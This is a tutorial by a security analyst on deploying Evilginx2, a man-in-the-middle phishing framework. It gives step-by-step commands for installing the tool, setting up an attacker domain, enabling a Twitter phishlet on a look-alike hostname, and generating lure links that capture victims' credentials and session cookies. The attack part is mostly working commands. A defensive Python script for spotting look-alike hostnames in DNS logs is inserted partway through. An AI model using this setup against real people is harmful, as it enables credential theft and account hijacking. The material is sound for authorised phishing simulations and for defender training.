Evilginx2 is the successor of Evilginx 1, and it stays in line with the man-in-the-middle (MITM) lineage. The tool is designed for phishing attacks that capture login credentials and a session cookie.
Table of Contents
Overview
Setup
Prerequisites
Installation
Domain Setup
Priming Evilginx
Execution
Lure Creation
Attack Simulation
Overview
One of the biggest concerns in today’s cyberspace is phishing, which turns something familiar to the user against them. Evilginx2 is a MITM attack framework that sits between the user and the site that they are trying to use, in order to potentially steal their credentials. The framework is written in Go and implements its own HTTP and DNS servers, making the setup process a breeze.
Setup
Let’s get acquainted with Evilginx2. The first thing we need to do is set up the Evilginx2 application on our attacking machine. Let’s get the IP.

    #ifconfig
Prerequisites
Evilginx has a few requirements before it can be installed and start working optimally. Let’s take care of them first.
We use pscp to upload the Go install file to our attacking machine, defining where it can find the file and the credentials and IP of the destination machine. Go is a prerequisite for setting up Evilginx. You can get Go 1.10.0 from here.

    pscp.exe c:\go1.10.linux-amd64.tar.gz root@68.183.85.197:/tmp/go1.10.linux-amd64.tar.gz
Once we have Go on our machine, we unpack and install it. Pscp deposited our Go file in the /tmp folder. We will now use the following commands to install Go and check its version:

    #cd /tmp/
    #ls
    #tar -C /usr/local -xzf go1.10.linux-amd64.tar.gz
    #export PATH=$PATH:/usr/local/go/bin
    #source $HOME/.profile
    #go version
Go needs to be added to ~/.profile now. Here’s how you do it:
Open the .profile file in nano or any other text editor and type in the following:

    export GOPATH=$HOME/go
    export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Next, install git and make by typing the following:

    #apt-get install git make
Installation
Now we are ready to install Evilginx. Let’s see how.

    #go get -u github.com/kgretzky/evilginx2
    #cd $GOPATH/src/github.com/kgretzky/evilginx2
    #make
    #make install
Let’s launch Evilginx by running the script.

    #../evilginx

There are multiple built-in site templates, called phishlets, that the attacker can choose from.
Domain Setup
Evilginx works as a relay between the victim and the legitimate website that they are trying to access. To achieve this, the attacker needs a domain of their own. There are plenty of resources on the web where a free domain can be obtained temporarily, and we used one such resource. We have set up an attacking domain: userid.cf.
The IP of our attacking machine is used as the IP address for the nameserver. If you recall, we noted it earlier in the process.
Priming Evilginx
This is the part where we prime Evilginx for the attack. At the Evilginx terminal, we use the help command to see the various general configuration options that it has.

    help
We need to configure Evilginx to use the domain name that we have set up for it and the IP of the attacking machine.

    #config domain userid.cf
    #config ip 68.183.85.197
Time to set up the domains. We have used the twitter phishlet with our domain, and Evilginx gives us a list of modified domain names that we can set up in our hosting site.

    #phishlets hostname twitter twittwer.com.userid.cf
    #phishlets get-hosts twitter

In our hosting site, we set the A record, which will be the IP of the attacking machine, and then copy and paste the domain names provided by Evilginx. One thing to note here: we don’t need to copy the “userid.cf” part, we just need the preceding string.
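From the defender's side, the hostname pattern configured above (a real or misspelled brand domain used as subdomain labels under an unrelated parent domain, as in twittwer.com.userid.cf) can be flagged in DNS or proxy logs. The following is an added example, not part of the original article; the protected-domain list, the log format and the two-label parent heuristic are assumptions.

```python
# Added example (not from the original article). Log lines below are constructed.
PROTECTED = {"twitter.com"}  # assumption: domains your users really sign in to

def edit_distance(a, b):
    """Levenshtein distance, to catch near-miss spellings of a protected domain."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(host, protected=PROTECTED, max_typos=2):
    host = host.lower().rstrip(".")
    labels = host.split(".")
    # Assumption: the last two labels approximate the registrable domain.
    # Production code should consult the Public Suffix List instead.
    parent, left = ".".join(labels[-2:]), labels[:-2]
    if parent in protected:
        return "legitimate"
    for brand in protected:
        if edit_distance(parent, brand) <= max_typos:
            return "lookalike-domain"
        width = brand.count(".") + 1
        # Slide a brand-sized window over the labels left of the parent domain.
        for i in range(len(left) - width + 1):
            distance = edit_distance(".".join(left[i:i + width]), brand)
            if distance == 0:
                return "brand-embedded"
            if distance <= max_typos:
                return "lookalike-embedded"
    return "unrelated"

def scan(log_lines):
    """Return (hostname, verdict) for every query that is not legitimate/unrelated."""
    hits = []
    for line in log_lines:
        host = line.rsplit("query=", 1)[-1].strip()
        verdict = classify(host)
        if verdict not in ("legitimate", "unrelated"):
            hits.append((host, verdict))
    return hits

SAMPLE_LOG = [  # constructed DNS query log
    "10:00:01 client=10.0.0.5 query=mobile.twitter.com",
    "10:00:07 client=10.0.0.9 query=twittwer.com.userid.cf",
    "10:00:09 client=10.0.0.9 query=www.example.org",
]

if __name__ == "__main__":
    for host, verdict in scan(SAMPLE_LOG):
        print(f"ALERT {verdict}: {host}")
```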
Execution
We now have everything we need to execute a successful attack using Evilginx.
The settings have been put into place, so now we can start using the tool for what it is intended.

    #phishlets enable twitter
Lure Creation
We now need a link that the victim clicks on. In Evilginx, the term for such a link is “lure”.
The help command shows us what options we must use for setting up the lures.

    #help lures
The lure has to be attached to our desired phishlet, and a redirect has to be set that points to the legitimate website that we are trying to harvest credentials for. Once the lures have been configured, we can see what the configurations yield.

    #lures
    #lures create twitter
    #lures edit redirect_url 0 ='https://www.twitter.com'
    #lures
    #lures get-url 0
Attack Simulation
When a victim clicks on our created lure, they will be sent to our phishlet, as can be seen below.
The victim enters their credentials and we see Evilginx2 capturing them and relaying them to the attack machine’s terminal.
This is a great tool to explore and understand phishing but at the same time, be sure to use it in a controlled setting.
Author: JDsingh is an Information Security Analyst | Pentester | Researcher